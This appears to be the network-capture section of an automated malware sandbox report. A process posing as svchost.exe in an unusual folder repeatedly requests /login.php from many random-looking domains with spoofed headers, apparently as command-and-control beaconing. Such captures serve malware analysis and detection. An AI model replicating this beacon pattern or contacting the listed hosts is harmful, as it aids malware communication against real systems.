Nov 11, 2024 18:14:52.823091030 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Nov 11, 2024 18:14:53.431340933 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345293\|1731345181\|40\|4\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Nov 11, 2024 18:14:53.668071985 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345293\|1731345181\|40\|4\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.6	64572	91.195.240.19	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.893867016 CET	271	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Nov 11, 2024 18:14:53.668584108 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:14:53 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA== last-modified: Mon, 11 Nov 2024 17:14:53 GMT x-cache-miss-from: parking-7596689c44-4sqbl server: Parking/1.0 Data Raw: 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED] Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com - gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
Nov 11, 2024 18:14:53.668596983 CET	1236	IN	Data Raw: 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c Data Ascii: eneral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.
Nov 11, 2024 18:14:53.668608904 CET	424	IN	Data Raw: 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 Data Ascii: -style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=re
Nov 11, 2024 18:14:53.668621063 CET	1236	IN	Data Raw: 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 62 75 74 74 6f 6e 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d Data Ascii: yle:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{box-sizing:border-box;color:inherit;display
Nov 11, 2024 18:14:53.668633938 CET	1236	IN	Data Raw: 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 69 6e 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d Data Ascii: ox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#949494}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:50px;text-al
Nov 11, 2024 18:14:53.668644905 CET	1236	IN	Data Raw: 61 63 79 50 6f 6c 69 63 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b Data Ascii: acyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#949494}.container-cookie-message{position:fixed;bottom:0;width576:100%;background:#5f5f5f;font-
Nov 11, 2024 18:14:53.668663979 CET	1236	IN	Data Raw: 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 35 30 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 65 6d 7d 2e 63 6f 6f 6b Data Ascii: e-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;border-collapse:collapse}.cookie-modal-window__content-body table
Nov 11, 2024 18:14:53.668677092 CET	1236	IN	Data Raw: 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 73 77 69 74 63 68 20 69 6e 70 75 74 7b 6f 70 61 63 Data Ascii: color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;right:
Nov 11, 2024 18:14:53.668689966 CET	1236	IN	Data Raw: 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68 69 76 65 7b 77 69 64 74 68 3a 33 30 25 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 Data Ascii: ainer-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:147px;flex-grow:1;width:300px}.container-content__container-ads{margin-top:8.5%}.container-content__container-ads--twot{margin-top:2
Nov 11, 2024 18:14:53.668751001 CET	1236	IN	Data Raw: 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 77 61 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 Data Ascii: tainer-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10
Nov 11, 2024 18:14:53.668762922 CET	1236	IN	Data Raw: 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 Data Ascii: rd;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-l

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.6	64575	188.114.97.3	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:55.057564974 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.6	64576	5.79.71.205	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:55.542689085 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.6	64577	13.248.169.48	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:59.827982903 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Nov 11, 2024 18:15:00.260653019 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 17:15:00 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.6	64578	188.114.96.3	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:59.863230944 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Nov 11, 2024 18:15:00.725749969 CET	789	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:15:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoixpU8y938mRYoHDWQSoYfZjJZxxIZDU1Pta9tfFfwjLskXNqnvVTvB6NKvWMwXxZ0alPCwiHx4guVSgzIxPJ21wpd037apXZFrwktTAIffs9IlqPjAE8i7NJ5YgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0febfe8de2abab-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12318&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=35&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:15:00.726519108 CET	168	IN	Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:15:00.726629972 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.6	64579	3.94.10.34	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:15:00.233278036 CET	352	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com Cookie: snkz=66.23.206.109; btst=1e822420cb8d3f7ff6bc20592f4b28e8\|66.23.206.109\|1731345185\|1731345185\|0\|1\|0
Nov 11, 2024 18:15:00.564445019 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:15:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=1e822420cb8d3f7ff6bc20592f4b28e8\|66.23.206.109\|1731345300\|1731345185\|57\|2\|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.6	64580	18.208.156.248	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:15:00.279036045 CET	352	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Cookie: snkz=66.23.206.109; btst=e5cea2794c01fe0d297510f888cbb928\|66.23.206.109\|1731345186\|1731345186\|0\|1\|0
Nov 11, 2024 18:15:00.696957111 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:15:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e5cea2794c01fe0d297510f888cbb928\|66.23.206.109\|1731345300\|1731345186\|57\|2\|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.6	64581	103.150.10.48	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:15:00.404441118 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Nov 11, 2024 18:15:01.185329914 CET	404	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Mon, 11 Nov 2024 17:15:01 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.232.163:8000/dh/147287063_343064.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.6	64583	106.15.232.163	8000	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:15:01.218662977 CET	290	OUT	GET /dh/147287063_343064.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.232.163:8000 Connection: Keep-Alive
Nov 11, 2024 18:15:02.010551929 CET	722	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Mon, 11 Nov 2024 17:15:01 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.6	64584	103.150.10.48	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:15:02.018311977 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Nov 11, 2024 18:15:03.583857059 CET	404	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Mon, 11 Nov 2024 17:15:02 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.232.163:8000/dh/147287063_343064.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:15:03.584877968 CET	404	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Mon, 11 Nov 2024 17:15:02 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.232.163:8000/dh/147287063_343064.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:15:03.585977077 CET	404	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Mon, 11 Nov 2024 17:15:02 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.232.163:8000/dh/147287063_343064.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	58867	188.114.96.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:02 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-11-11 17:13:03 UTC	947	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:13:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FDDu%2FsrzGXWHHKKGVBYI2S6m%2Fzoka67dQJ89SciC3%2Bxio3CC9HtqhehLr0I7ENnEt7K7yDM7sepmi25Jlg5PC30Kw5jCglsLlG5BeOwwF3nQ2jJYN8uxXoMdbKrpvw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe91d8fe55e61-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1279&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2238021&cwnd=244&unsent_bytes=0&cid=2b60c149bad0ee63&ts=943&x=0"
